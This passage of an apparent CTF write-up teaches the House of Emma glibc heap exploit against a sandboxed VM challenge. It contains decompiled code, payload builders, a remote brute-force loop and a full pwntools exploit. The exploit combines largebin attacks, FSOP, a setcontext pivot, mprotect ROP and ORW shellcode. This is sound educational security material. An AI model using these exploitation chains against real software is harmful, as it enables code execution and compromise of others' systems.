According to the GLIBC source code, it will execute write_cb, namely the write pointer inside this structure:

However, it cannot be disassembled, because all of these pointers are encrypted with the PTR_MANGLE macro introduced earlier.

Let's decrypt this one using the algorithm described in the previous chapters. First, we need the pointer_guard value, randomly generated at runtime and stored at fs:[0x30]:

Extract these values and apply the decryption algorithm by PTR_DEMANGLE:

ror(enc, 0x11, 64) ^ pointer_guard

In our demo, it should be calculated as:

ror(0x45784fde6bfd6c6a, 0x11, 64) ^ 0xb63577e972ba6797

Calculate the result:

def ror(value, shift, bit_size):
    """Performs a bitwise right rotate (ROR) on the given value."""
    return ((value >> shift) | (value << (bit_size - shift))) & ((1 << bit_size) - 1)

# Encrypted value and pointer guard
encrypted_value = 0x45784fde6bfd6c6a
pointer_guard = 0xb63577e972ba6797
shift_value = 0x11  # The shift for the ROR operation
bit_size = 64       # 64-bit values

# Apply the ROR and XOR with pointer_guard
decrypted_value = ror(encrypted_value, shift_value, bit_size) ^ pointer_guard
print(hex(decrypted_value))  # 0x555555555269

We have a result of 93824992236137 (0x555555555269 in hexadecimal). Now it looks like a valid function pointer which can be disassembled:

Exactly! This is the my_write function assigned to io_funcs.write in the C code, stored in a structure with the same layout as cookie_io_functions_t. If we can hijack this value at offset 0xF0 within the _IO_cookie_file structure, we can take control of rip and ultimately hijack the entire execution flow!

End

In conclusion, the target of the attack chain in the House of Emma exploit is the __io_functions.write function, located at offset 0xF0 within the _IO_cookie_file structure. This function references the __cookie pointer, which is used as the first argument (rdi) and is positioned at offset 0xE0.

The attack chain can be depicted as:

_IO_cookie_write
      └───► write_cb
               └───► cfile->__io_functions.write (cfile->__cookie, buf, size)
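Putting the offsets together, the fields House of Emma depends on can be laid out in a fake _IO_cookie_file as in the sketch below. All addresses are hypothetical, the helper name is illustrative, and the vtable shift assumes the xsputn trigger used in this post; other fields of the fake stderr are left zeroed, which a real exploit generally cannot afford.

```python
import struct


def rol(value: int, shift: int, bits: int = 64) -> int:
    return ((value << shift) | (value >> (bits - shift))) & ((1 << bits) - 1)


def build_fake_cookie_file(io_cookie_jumps: int, cookie: int, gadget: int,
                           evil_guard: int) -> bytes:
    """Fields House of Emma relies on, at their offsets in struct _IO_cookie_file.

    Everything else is zero here. A working exploit typically also needs at
    least a writable _lock pointer and suitable _flags so that the stdio call
    reaches the vtable dispatch; those are out of scope for this sketch.
    """
    fake = bytearray(0x108)  # sizeof(struct _IO_cookie_file) on x86_64
    # vtable: the xsputn slot (0x38) now lands on _IO_cookie_write (0x78)
    struct.pack_into("<Q", fake, 0xD8, io_cookie_jumps + 0x40)
    # __cookie: becomes the first argument (rdi) of write_cb
    struct.pack_into("<Q", fake, 0xE0, cookie)
    # __io_functions.write: mangled with the guard we planted at fs:[0x30]
    struct.pack_into("<Q", fake, 0xF0, rol(gadget ^ evil_guard, 0x11))
    return bytes(fake)


# Hypothetical addresses, for illustration only.
payload = build_fake_cookie_file(
    io_cookie_jumps=0x7FFFF7F9AA20,
    cookie=0x55555555C000,
    gadget=0x7FFFF7F1B0C0,
    evil_guard=0x55555555B2A0,
)
print(len(payload), payload[0xD8:0xF8].hex())
```

If the fake stderr pointer is planted by a Largebin Attack, it normally points at the victim chunk's header, so data written through that chunk's user area corresponds to payload[0x10:].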

Writeup

In the final chapter, I will share a writeup on exploiting a PWN challenge using the House of Emma methodology, combined with the I/O stream trigger strategy from House of Kiwi.

Binary: link

EXP template: link

Impression

The binary has full protections enabled and runs in a sandbox, but we can still exploit it using the ORW (Open, Read, Write) technique introduced here:

This is not a typical program—it behaves like a virtual machine, telling us only to supply opcodes in binary form:

On Linux, we can feed binary data to the program as follows, which is helpful for debugging:

Since our test payload is meaningless, the program answers "Invalid opcode" and keeps looping:

To understand how this program operates, we must decompile the binary to uncover its functionality.

Code Review

Since main never calls exit, and other functions only use _exit (which does not flush stdio streams and therefore won't trigger the I/O operations our FSOP attack needs), we need to leverage the House of Kiwi primitive and trigger __malloc_assert instead.

Main

void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
{
  void *s; // [rsp+8h] [rbp-8h]

  setup(a1, a2, a3);
  while ( 1 )
  {
    puts("Pls input the opcode");
    s = malloc(0x2000uLL);
    memset(s, 0, 0x2000uLL);
    read(0, s, 0x500uLL);
    vm_run(s);
    free(s);
  }
}

It runs an infinite loop, repeatedly asking for user input (opcodes) and executing them in a virtual machine-like environment.

The while (1) loop continuously runs the following operations:

  • s = malloc(0x2000uLL): Allocates 0x2000 bytes of memory to hold the user's input.
  • memset(s, 0, 0x2000uLL): Clears the allocated memory by setting it to zero.
  • read(0, s, 0x500uLL): Reads up to 0x500 bytes from the standard input (file descriptor 0, i.e., stdin) into the allocated memory s.
  • vm_run(s): Passes the input to a function called vm_run, which interprets and executes the opcodes in the memory pointed to by s.
  • free(s): Frees the allocated memory after vm_run completes.

Setup

int sub_16D5()
{
  // ... omit variables
  
  v35 = __readfsqword(0x28u);
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stderr, 0LL, 2, 0LL);
  prctl(38, 1LL, 0LL, 0LL, 0LL);
  
  // ... omit dereference
  
  return prctl(22, 2LL, &v1);
}

Usually we don't pay much attention to the setup function, but this one matters: besides configuring stdio buffering, it uses the prctl syscall to build the sandbox that forces us into an ORW chain.

  1. Set Buffering Mode for I/O Streams:
    • The calls to setvbuf(stdin, 0LL, 2, 0LL), setvbuf(stdout, 0LL, 2, 0LL), and setvbuf(stderr, 0LL, 2, 0LL) disable buffering for stdin, stdout, and stderr streams. This means all input/output operations are immediate without buffering, often done to avoid delays in interactive programs.
  2. prctl(38, 1LL, 0LL, 0LL, 0LL):
    • This corresponds to PR_SET_NO_NEW_PRIVS (38). Setting it to 1 means execve can no longer grant new privileges (for example, through setuid/setgid binaries). It is also required before an unprivileged process can install a seccomp filter.
  3. prctl(22, 2LL, &v1):
    • Option 22 is PR_SET_SECCOMP, and 2 is SECCOMP_MODE_FILTER. This call installs the seccomp BPF filter described by v1 (a struct sock_fprog), which is the sandbox restricting our syscalls. The value 8 stored in v1 is most likely the filter length, i.e., the number of BPF instructions.

Add

_DWORD *__fastcall add(__int64 a1)
{
  _DWORD *result; // rax
  unsigned __int8 idx; // [rsp+1Dh] [rbp-13h]
  unsigned __int16 size; // [rsp+1Eh] [rbp-12h]

  idx = *(_BYTE *)(a1 + 1);
  size = *(_WORD *)(a1 + 2);
  if ( size <= 0x40Fu || size > 0x500u || idx > 0x10u )
  {
    puts("ERROR");
    _exit(0);
  }
  pool[idx] = calloc(1uLL, size);
  result = size_pool;
  size_pool[idx] = size;
  return result;
}

The add function reads an index (idx) and a size (size) from the opcode buffer, validates them, allocates a chunk with calloc, stores the pointer in pool[idx], and records the requested size in size_pool[idx].

If the inputs are invalid (the size must be between 0x410 and 0x500 inclusive, and idx at most 0x10), it terminates the program with _exit.
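Since vm_run consumes raw bytes, it helps to encode instructions programmatically. The helper below is a hypothetical sketch derived only from the decompiled add() and vm_run: one opcode byte (vm_run only looks at its low nibble), the index byte, and the size as a 16-bit little-endian word (x86_64 byte order), for 4 bytes in total.

```python
import struct

OP_ADD = 1  # vm_run dispatches on (first byte & 0xF)


def op_add(idx: int, size: int) -> bytes:
    """Encode one add instruction: opcode, idx (u8), size (little-endian u16).

    vm_run moves past it by 4 bytes, matching the packed size below.
    """
    # Mirror the checks in add(); failing them makes the binary _exit(0).
    if size <= 0x40F or size > 0x500 or idx > 0x10:
        raise ValueError("add() would print ERROR and call _exit(0)")
    return struct.pack("<BBH", OP_ADD, idx, size)


print(op_add(0, 0x418).hex())  # 01001804
```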

Delete

void __fastcall delete(__int64 a1)
{
  unsigned __int8 idx; // [rsp+1Fh] [rbp-1h]

  idx = *(_BYTE *)(a1 + 1);
  if ( idx > 0x10u || !*((_QWORD *)&pool + idx) )
  {
    puts("Invalid idx");
    _exit(0);
  }
  free(*((void **)&pool + idx));
}

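delete() frees the chunk but never clears pool[idx] (or size_pool[idx]), leaving a dangling pointer: a classic use-after-free (UAF). Because show() and edit() only check that pool[idx] is non-NULL, we can keep reading and writing freed chunks, which is what makes the leaks and the chunk overlapping possible.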

Show

int __fastcall show(__int64 a1)
{
  unsigned __int8 idx; // [rsp+1Fh] [rbp-1h]

  idx = *(_BYTE *)(a1 + 1);
  if ( idx > 0x10u || !*((_QWORD *)&pool + idx) )
  {
    puts("Invalid idx");
    _exit(0);
  }
  return puts(*((const char **)&pool + idx));
}

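show() only checks that pool[idx] is non-NULL, so with the UAF we can call it on a freed chunk and puts() prints its fd/bk pointers, leaking a libc address (inside main_arena). puts() also has no length limit and prints until the first NUL byte, so after overwriting fd and bk with 0x10 bytes of padding it runs on into fd_nextsize and leaks a heap address.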
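Decoding these leaks is plain little-endian arithmetic. The sketch below does what the EXP's l64()/uu64() helpers do, without pwntools. The offsets 0x1f30b0 (main_arena + 1104 relative to the libc base) and 0x2ae0 (chunk 2 relative to the heap base) are the values the EXP uses for this particular libc and heap layout, so treat them as environment-specific.

```python
LIBC_LEAK_OFF = 0x1f30b0   # value used in the EXP (main_arena + 1104); environment-specific
HEAP_LEAK_OFF = 0x2ae0     # chunk 2's offset from heap_base in the EXP's layout


def u64_leak(raw):
    """Decode up to 6 little-endian bytes printed by puts().

    puts() stops at the first NUL, and canonical x86-64 user-space pointers
    have two zero high bytes, so at most 6 bytes of a pointer arrive."""
    return int.from_bytes(raw[:6].ljust(8, b"\x00"), "little")


def parse_libc_leak(line):
    """fd of a freed largebin chunk points into main_arena (0x7f... on x86-64)."""
    end = line.index(b"\x7f") + 1
    return u64_leak(line[end - 6:end]) - LIBC_LEAK_OFF


def parse_heap_leak(line, pad=0x10):
    """After edit(2, b'a' * 0x10), puts() prints the padding, then fd_nextsize."""
    return u64_leak(line[pad:pad + 6]) - HEAP_LEAK_OFF
```

Both results should be page aligned (low 12 bits zero), which is a cheap sanity check before continuing the exploit.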

Edit

void *__fastcall edit(__int64 a1)
{
  unsigned __int8 idx; // [rsp+1Dh] [rbp-3h]
  unsigned __int16 size; // [rsp+1Eh] [rbp-2h]

  idx = *(_BYTE *)(a1 + 1);
  size = *(_WORD *)(a1 + 2);
  if ( idx > 0x10u || !*((_QWORD *)&pool + idx) )
  {
    puts("Invalid idx");
    _exit(0);
  }
  if ( (unsigned int)size > size_pool[idx] )
  {
    puts("Invalid size");
    size = size_pool[idx];
  }
  return memcpy(*((void **)&pool + idx), (const void *)(a1 + 4), size);
}

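edit() copies the size bytes that follow its 4-byte header in the opcode stream into the chunk at pool[idx]. The length is clamped to size_pool[idx], so there is no overflow on its own, but since pool[idx] is never cleared it lets us rewrite the fd, bk, fd_nextsize and bk_nextsize fields of a freed chunk.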

Vm_run

__int64 __fastcall vm_run(__int64 a1)
{
  while ( 1 )
  {
    switch ( *(_BYTE *)a1 & 0xF )
    {
      case 1:
        add(a1);
        a1 += 4LL;
        puts("Malloc Done");
        break;
      case 2:
        delete(a1);
        a1 += 2LL;
        puts("Del Done");
        break;
      case 3:
        show(a1);
        a1 += 2LL;
        puts("Show Done");
        break;
      case 4:
        edit(a1);
        a1 += *(unsigned __int16 *)(a1 + 2) + 4LL;
        puts("Edit Done");
        break;
      case 5:
        return 0LL;
      case 6:
        *(_WORD *)(a1 + 3) = *(unsigned __int8 *)(a1 + 2) + *(unsigned __int8 *)(a1 + 1);
        a1 += 5LL;
        break;
      case 7:
        *(_WORD *)(a1 + 3) = *(unsigned __int8 *)(a1 + 2) - *(unsigned __int8 *)(a1 + 1);
        a1 += 5LL;
        break;
      case 8:
        *(_WORD *)(a1 + 3) = (unsigned __int8)(*(_BYTE *)(a1 + 1) ^ *(_BYTE *)(a1 + 2));
        a1 += 5LL;
        break;
      case 9:
        *(_WORD *)(a1 + 3) = *(unsigned __int8 *)(a1 + 2) * *(unsigned __int8 *)(a1 + 1);
        a1 += 5LL;
        break;
      case 0x10:
        *(_WORD *)(a1 + 3) = (unsigned __int8)(*(_BYTE *)(a1 + 2) / *(_BYTE *)(a1 + 1));
        a1 += 5LL;
        break;
      default:
        puts("Invalid opcode");
        break;
    }
  }
}

The vm_run function acts like a virtual machine interpreter, continuously reading and executing commands based on a series of opcodes from the memory location pointed to by a1. Each opcode determines the operation to be performed.

  1. Infinite Loop:
    • The function runs an infinite loop (while (1)) and reads opcodes from the memory location at a1.
  2. Opcode Handling:
    • The function checks the opcode by evaluating *(_BYTE *)a1 & 0xF, which extracts the lower 4 bits of the byte at a1. Based on this value, the function branches to different cases.
  3. Operations:
    • Case 1: Calls add(a1) to allocate a chunk and advances a1 by 4 bytes.
    • Case 2: Calls delete(a1) to free a chunk and advances a1 by 2 bytes.
    • Case 3: Calls show(a1) to print a chunk and advances a1 by 2 bytes.
    • Case 4: Calls edit(a1) to write into a chunk and advances a1 by 4 bytes plus the 16-bit length stored at a1 + 2.
    • Case 5: Terminates the loop by returning 0, signaling the end of execution.
    • Cases 6-9: Perform addition, subtraction, XOR and multiplication on the bytes at a1 + 1 and a1 + 2, store the 16-bit result at a1 + 3 and advance a1 by 5 bytes. The division case 0x10 is dead code: the opcode is masked with 0xF, so it can never equal 0x10.
  4. Error Handling:
    • Any other value prints "Invalid opcode". The default case does not advance a1, so the interpreter keeps printing the same message forever.

The vm_run function is a simple virtual machine that processes opcodes, performing actions like memory allocation (add), deletion (delete), display (show), and modification (edit). The basic arithmetic operations are just for fun :). The function continuously executes until it encounters a termination opcode (5).
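Because the VM format is tiny, an assembler/disassembler is handy for checking payloads before sending them. This is a hypothetical helper, not part of the challenge: it uses the same byte layout as the EXP's add/free/show/edit helpers and walks the stream the way vm_run advances a1 (arithmetic operands are skipped, not evaluated).

```python
import struct


def op_add(idx, size):
    return struct.pack("<BBH", 1, idx, size)


def op_free(idx):
    return struct.pack("<BB", 2, idx)


def op_show(idx):
    return struct.pack("<BB", 3, idx)


def op_edit(idx, buf):
    return struct.pack("<BBH", 4, idx, len(buf)) + buf


def op_end():
    return b"\x05"


def disassemble(code):
    """Walk an opcode stream the way vm_run advances a1."""
    pc, out = 0, []
    while pc < len(code):
        op = code[pc] & 0xF                       # only the low nibble is used
        if op == 1:
            size = struct.unpack_from("<H", code, pc + 2)[0]
            out.append(("add", code[pc + 1], size))
            pc += 4
        elif op in (2, 3):
            out.append(("free" if op == 2 else "show", code[pc + 1]))
            pc += 2
        elif op == 4:
            n = struct.unpack_from("<H", code, pc + 2)[0]
            out.append(("edit", code[pc + 1], code[pc + 4:pc + 4 + n]))
            pc += 4 + n                           # vm_run skips the unclamped length
        elif op == 5:
            out.append(("end",))
            break
        elif op in (6, 7, 8, 9):
            out.append(("arith", op))             # operands are not evaluated
            pc += 5
        else:
            # vm_run's default case never advances a1, so the real VM would
            # print "Invalid opcode" forever; the model stops instead.
            out.append(("invalid", code[pc]))
            break
    return out
```

For example, op_add(8, 0x450) + op_end() produces exactly the trigger bytes b'\x01\x08P\x04\x05' noted in the EXP.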

Methodology

The opcodes are stored in a 0x2000 chunk, the first one the program allocates, and this buffer is cleared each time vm_run returns through opcode 5.
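The heap offsets hard-coded in the EXP (heap_base+0x22a0 for chunk 0, heap_base+0x2ae0 for chunk 2) follow from this buffer being allocated first. The sketch below reproduces them, assuming the opcode buffer is a 0x2000-byte request placed right after the 0x290-byte tcache_perthread_struct chunk (its size on x86-64 since glibc 2.30), and that nothing else touches the heap before it, which is plausible because setvbuf() disabled the stdio buffers.

```python
TCACHE_STRUCT_CHUNK = 0x290   # tcache_perthread_struct chunk, glibc >= 2.30, x86-64
OPCODE_BUF_REQ = 0x2000       # assumption: size requested for the opcode buffer


def chunk_size(req):
    """request2size() for requests >= 0x10 on x86-64 (8-byte header, 16-byte align)."""
    return (req + 0x8 + 0xf) & ~0xf


def chunk_offsets(requests):
    """Chunk-header offset of each allocation relative to heap_base, plus top's offset."""
    off = TCACHE_STRUCT_CHUNK + chunk_size(OPCODE_BUF_REQ)
    offsets = []
    for req in requests:
        offsets.append(off)
        off += chunk_size(req)
    return offsets, off


# add(0, 0x410); add(1, 0x410); add(2, 0x420); add(3, 0x410) from the EXP
offsets, top = chunk_offsets([0x410, 0x410, 0x420, 0x410])
```

offsets comes out as [0x22a0, 0x26c0, 0x2ae0, 0x2f10], matching the constants the EXP uses for chunks 0 and 2.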

With the vulnerabilities identified through code review, we can exploit this challenge by following these steps:

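  1. Leak Addresses via the Use-After-Free (UAF) Primitive: Showing a freed largebin chunk leaks a libc address (main_arena) and, after padding over fd/bk, a heap address. The same dangling pointers later let us forge largebin metadata and overlap chunks.
  2. Hijack the stderr Pointer: Using a Largebin Attack, we overwrite the stderr pointer with a known address, namely the heap address of the smaller chunk inserted into the largebin, which becomes our fake FILE.
  3. Hijack the pointer_guard (__pointer_chk_guard): A second Largebin Attack overwrites the pointer guard stored at fs:[0x30] with a known heap address. This is the key glibc uses in PTR_MANGLE, so controlling it lets us forge the mangled function pointer that _IO_cookie_write demangles and calls.
  4. Modify the Top Chunk Size: We free a chunk that borders the top chunk so it merges into top, then use its dangling pointer to overwrite the top chunk's size with a small value (0x300, PREV_INUSE clear). The next large request fails the sanity assertion in sysmalloc, and __malloc_assert writes to stderr: the House of Kiwi trigger.
  5. House of Emma Attack Chain: We forge the __cookie and __io_functions.write fields of an _IO_cookie_file and set the vtable pointer to _IO_cookie_jumps+0x40, so the I/O call issued on stderr lands in _IO_cookie_write. It demangles write and calls it with __cookie as rdi, which gives us control of RIP. In my EXP, that call goes to a getkeyserv_handle+276 gadget, which loads rdx from the cookie and calls setcontext+61.
  6. ORW (Open, Read, Write) Chain: setcontext+61 pivots the stack onto a short ROP chain that calls mprotect to make the heap executable, then returns into open/read/write shellcode (shellcraft.cat) that prints the flag.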
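Steps 2 to 5 rest on three small pieces of arithmetic, modelled below. This is a toy model written for illustration, not glibc code, and it assumes the usual x86-64 field offsets. The largebin function mimics the branch of _int_malloc that inserts a chunk smaller than everything already in the bin, which is why the EXP stores target - 0x20 in bk_nextsize. ptr_mangle/ptr_demangle follow the x86-64 PTR_MANGLE macro (xor with fs:[0x30], rotate by 0x11). The vtable arithmetic assumes that the first vtable call on the stderr path is the xsputn slot, so shifting the vtable by 0x40 turns it into the write slot, i.e. _IO_cookie_write.

```python
MASK64 = (1 << 64) - 1
FD_NEXTSIZE, BK_NEXTSIZE = 0x20, 0x28        # malloc_chunk offsets on x86-64


def largebin_insert_smaller(mem, bin_first, victim):
    """Toy model of the largebin insert when victim is smaller than every
    chunk in the bin; bin_first is the bin's first chunk (fwd->fd in glibc)."""
    mem[victim + FD_NEXTSIZE] = bin_first
    mem[victim + BK_NEXTSIZE] = mem[bin_first + BK_NEXTSIZE]   # forged via UAF edit
    # victim->bk_nextsize->fd_nextsize = victim: writes victim's address to target
    mem[mem[victim + BK_NEXTSIZE] + FD_NEXTSIZE] = victim
    mem[bin_first + BK_NEXTSIZE] = victim


def rol64(x, n):
    return ((x << n) | (x >> (64 - n))) & MASK64


def ror64(x, n):
    return ((x >> n) | (x << (64 - n))) & MASK64


def ptr_mangle(ptr, guard):
    """x86-64 PTR_MANGLE: xor with the guard at fs:[0x30], then rotate left 0x11."""
    return rol64(ptr ^ guard, 0x11)


def ptr_demangle(enc, guard):
    """PTR_DEMANGLE, applied by _IO_cookie_write before the indirect call."""
    return ror64(enc, 0x11) ^ guard


# struct _IO_jump_t slot offsets (glibc libio/libioP.h)
XSPUTN, WRITE = 0x38, 0x78


def slot_hit(vtable_shift, slot):
    """Offset inside _IO_cookie_jumps reached by a call through `slot`."""
    return vtable_shift + slot
```

In the EXP, the forged guard is chunk 0's address (heap_base + 0x22a0), which is why PTR_MANGLE is called with that value.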

Brute Force TCB

We mentioned earlier that the pointer guard is stored at fs:[0x30], which can be viewed in GDB, allowing us to calculate the offset relative to the leaked LIBC base address.

However, this offset can vary across environments, because the TLS block holding the TCB is set up at runtime by the dynamic loader (ld). In addition, random padding between the ld and libc mappings makes the exact location harder to pin down.

When exploiting this type of challenge on a remote server, it may become necessary to brute-force the address of the Thread Control Block (TCB) referenced by the FS register. The lower 12 bits of the TCB address stay constant (they are a page offset), so the guessing focuses on the 4th, 5th and 6th hex digits of the 64-bit address. The script below fixes the 6th digit at 0x6 and iterates over the 4th and 5th, i.e. at most 256 attempts. Here's an example of a brute-forcing script:

for x in range(0x10):
    for y in range(0x10):
        offset  = 0x6 << 20    # 6th hex digit fixed: candidates start at 0x600000
        offset += x << 16      # 5th hex digit: 0x600000 to 0x6F0000
        offset += y << 12      # 4th hex digit: one 0x1000 (4KB) memory page at a time
        log.success("try offset:\t" + hex(offset))
        p = remote(remote_ip_addr, remote_port)    # fresh connection for every guess
        try:
            # exploit script: exp() would take the candidate and compute
            # ld_base = libc_base + offset once libc_base has been leaked
            exp(offset)
        except EOFError:
            p.close()

As an alternative, we can also set up a Docker environment to simulate the remote target, allowing us to test and identify the ld base address before launching the actual exploit.

EXP

Detailed explanations are provided in the comments of the Python script. You will need to adjust the pointer_guard offset (ptr_guard_addr) to match your environment:

from pwn import *
import inspect


def g(gdbscript=''):
    if mode['local']:
        sysroot = None
        if libc_path != '':
            sysroot = os.path.dirname(libc_path)
        gdb.attach(p, gdbscript=gdbscript, sysroot=sysroot)
        if gdbscript == '':
            input()
    
    elif mode['remote']:
        gdb.attach((remote_ip_addr, remote_port), gdbscript)
        if gdbscript == '':
            input()


def pa(addr):
    frame = inspect.currentframe().f_back
    variables = {k: v for k, v in frame.f_locals.items() if v is addr}
    desc = next(iter(variables.keys()), "unknown")
    info('@{} ---> %#x'.format(desc), addr)
    

s       = lambda data                 :p.send(data)
sa      = lambda delim,data           :p.sendafter(delim, data)
sl      = lambda data                 :p.sendline(data)
sla     = lambda delim,data           :p.sendlineafter(delim, data)
r       = lambda num=4096             :p.recv(num)
ru      = lambda delim, drop=True     :p.recvuntil(delim, drop)
l64     = lambda                      :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu64    = lambda data                 :u64(data.ljust(8, b'\0'))
    

def rol(xor, shift, bit_size):
    """Performs a bitwise left rotate (ROL) on the enc."""
    return ((xor << shift) | (xor >> (bit_size - shift))) & ((1 << bit_size) - 1)

def PTR_MANGLE(ptr, ptr_guard, shift, bit_size):
    xor = ptr ^ ptr_guard
    return rol(xor, shift, bit_size)


def add(idx, size):
    global opcodes
    op  = p8(0x1)
    op += p8(idx)
    op += p16(size)
    opcodes += op


def free(idx):
    global opcodes
    op  = p8(0x2)
    op += p8(idx)
    opcodes += op


def edit(idx, buf):
    global opcodes
    op  = p8(0x4)
    op += p8(idx)
    op += p16(len(buf))
    op += buf
    opcodes += op


def show(idx):
    global opcodes
    op  = p8(0x3)
    op += p8(idx)
    opcodes += op
    

def run_opcode():
    global opcodes
    opcodes += p8(0x5)
    sa("opcode\n", opcodes)
    # print('[!] Run opcodes: ', str(opcodes))
    opcodes = b""


opcodes  = b''
deadbeef = p64(0xdeadbeef)


def exp():
    # -------- 1 -------- Leak Addresses
    # UAF
    add(0, 0x410)
    add(1, 0x410)
    add(2, 0x420)
    add(3, 0x410)
    free(2)         # 2 -> usbin
    add(4, 0x430)   # 2 -> lbin
    show(2)
    run_opcode()
    libc_base = l64() - 0x1f30b0  # main_arena + 1104
    pa(libc_base)
    edit(2, b'a'*0x10)
    show(2)
    run_opcode()
    ru(b'a'*0x10)
    heap_base = uu64(r(6)) - 0x2ae0
    pa(heap_base)
    
    # ------- 2 -------- Bullets
    stderr           = libc_base + libc.sym['stderr']
    _IO_cookie_jumps = libc_base + libc.sym['_IO_cookie_jumps']
    ptr_guard_addr   = libc_base - 0x28c0 + 0x30 # fs:[0x30]
    setcontext       = libc_base + libc.sym['setcontext'] + 61
    mprotect         = libc_base + libc.sym['mprotect']
    gksh_gadget      = libc_base + 0x146020 # mov rdx, [rdi + 8]; mov [rsp], rax; call [rdx + 0x20]; 
    pa(stderr)
    pa(ptr_guard_addr)
    pa(_IO_cookie_jumps)
    pa(setcontext)
    pa(gksh_gadget)
    
    rop         = ROP(libc)
    p_rdi_r     = libc_base + rop.find_gadget(['pop rdi', 'ret'])[0]
    p_rsi_r     = libc_base + rop.find_gadget(['pop rsi', 'ret'])[0]
    p_rdx_rbx_r = libc_base + rop.find_gadget(['pop rdx', 'pop rbx', 'ret'])[0]
    p_rax_r     = libc_base + rop.find_gadget(['pop rax', 'ret'])[0]
    syscall_r   = libc_base + rop.find_gadget(['syscall', 'ret'])[0]
    ret         = libc_base + rop.find_gadget(['ret'])[0]
    
    fakeIO_addr    = heap_base+0x22a0   # 0
    mprotect_chain = [p_rdi_r, fakeIO_addr&(~0xfff), p_rsi_r, 0x4000, \
                    p_rdx_rbx_r, 7, 0, mprotect, fakeIO_addr+0x140]	# 0x48 bytes
    orw_chain      = asm(shellcraft.cat('./flag'))	# 0x23 bytes
    pa(fakeIO_addr)
    
    # -------- 3 -------- Largebin Attack stderr
    free(0) 
    pl = flat({
        0x0:  [libc_base+0x1f30b0, libc_base+0x1f30b0],
        0x10: [heap_base+0x2ae0, stderr-0x20],  # hijack bk_nextsize
    })
    edit(2, pl)     # 2 -> lbin larger
    add(5, 0x430)   # 0 -> lbin smaller <- *stderr
    # recover 2
    pl = flat({
        0x0: [heap_base+0x22a0, libc_base+0x1f30b0],
        0x10: [heap_base+0x22a0, heap_base+0x22a0], # address of heap 0
    })
    edit(2, pl)
    # recover 0
    pl = flat({
        0x0: [libc_base+0x1f30b0, heap_base+0x2ae0],
        0x10: [heap_base+0x2ae0, heap_base+0x2ae0], # address of heap 2
    })
    edit(0, pl)
    add(2, 0x420)
    add(0, 0x410)
    run_opcode()
    
    # -------- 4 -------- Largebin Attack Pointer Guard
    free(2)
    add(6, 0x430)
    free(0)
    pl = flat({
        0x0:  [libc_base+0x1f30b0, libc_base+0x1f30b0],
        0x10: [heap_base+0x2ae0, ptr_guard_addr-0x20],  # hijack bk_nextsize
    })
    edit(2, pl)     # 2 -> lbin larger
    add(7, 0x450)   # 0 -> lbin smaller <- *ptr_guard_addr
    # recover 2
    pl = flat({
        0x0: [heap_base+0x22a0, libc_base+0x1f30b0],
        0x10: [heap_base+0x22a0, heap_base+0x22a0], # address of heap 0
    })
    edit(2, pl)
    # recover 0
    pl = flat({
        0x0: [libc_base+0x1f30b0, heap_base+0x2ae0],
        0x10: [heap_base+0x2ae0, heap_base+0x2ae0], # address of heap 2
    })
    edit(0, pl)
    add(2, 0x420)
    add(0, 0x410)
    
    # -------- 5 -------- House of Kiwi
    # change top chunk size
    free(7) # 7 -> top chunk
    add(8, 0x430)
    edit(7, b'a'*0x438+p64(0x300))
    run_opcode()
    
    # FSOP
    pl = flat({
        # fake stderr & _IO_cookie_file  
        0: {  
            0x0:  0,    # _flags
            0x20: 0,    # _IO_write_base
            0x28: 1,    # _IO_write_ptr
            0x38: 0,    # _IO_buf_base
            0x40: 0,    # _IO_buf_end
            0x68: 0,    # _chain
            0x88: fakeIO_addr+0x300,    # _lock (must point to writable memory)
            0xc0: 0,    # _mode
            0xd8: _IO_cookie_jumps+0x40,    # vtable
            0xe0: fakeIO_addr + 0x100,   # __cookie, passed to write() in rdi
            # __io_functions.write, mangled with the forged guard (chunk 0's address)
            # gadget: mov rdx, [rdi + 8]; mov [rsp], rax; call [rdx + 0x20];
            0xf0: PTR_MANGLE(gksh_gadget, heap_base+0x22a0, 0x11, 64),  # enc
        },
        # ORW
        0x100: {
            0x8:  fakeIO_addr + 0x100,  # rdx
            # <+61>:  mov rsp, [rdx+0xa0]
            # <+294>: mov rcx, [rdx+0xa8]
            # <+301>: push rcx
            # <+334>: ret
            0x20: setcontext,   # gksh_gadget ->
            0x40: orw_chain,    # mprotect ->        
            0xa0: [fakeIO_addr+0x200, ret],
        },
        0x200: {
            0x0: mprotect_chain,
        }
    }, filler=b'\0')
    edit(0, pl[0x10:])
    # g()
    
    # trigger
    add(8, 0x450)  # b'\x01\x08P\x04\x05'
    """
    Manually trigger after breakpoint:
    
    printf '\x01\x08P\x04\x05' > pl.bin
    cat pl.bin > /proc/<pid>/fd/0
    """
    run_opcode()
    # g()
    
    p.interactive()
    
    
if __name__ == '__main__':
    
    file_path = './pwn'
    libc_path = './libc.so.6'
    ld_path   = './ld.so'
    
    context(arch='amd64', os='linux', endian='little')
    # context.log_level='debug'
    
    e    = ELF(file_path, checksec=False)
    mode = {'local': False, 'remote': False, }
    env  = None
    
    if len(sys.argv) > 1:
        if libc_path != '':
            libc = ELF(libc_path)
        p = remote(sys.argv[1], int(sys.argv[2]))
        mode['remote'] = True
        remote_ip_addr = sys.argv[1]
        remote_port    = int(sys.argv[2])
    else:
        if libc_path != '':
            libc = ELF(libc_path)
            env  = {'LD_PRELOAD': libc_path}
        if ld_path != '':
            cmd = [ld_path, '--library-path', os.path.dirname(os.path.abspath(libc_path)), file_path]
            p   = process(cmd, env=env)
        else:
            p = process(file_path, env=env)
        mode['local'] = True
        
    exp()

Pwned:


Are you watching me?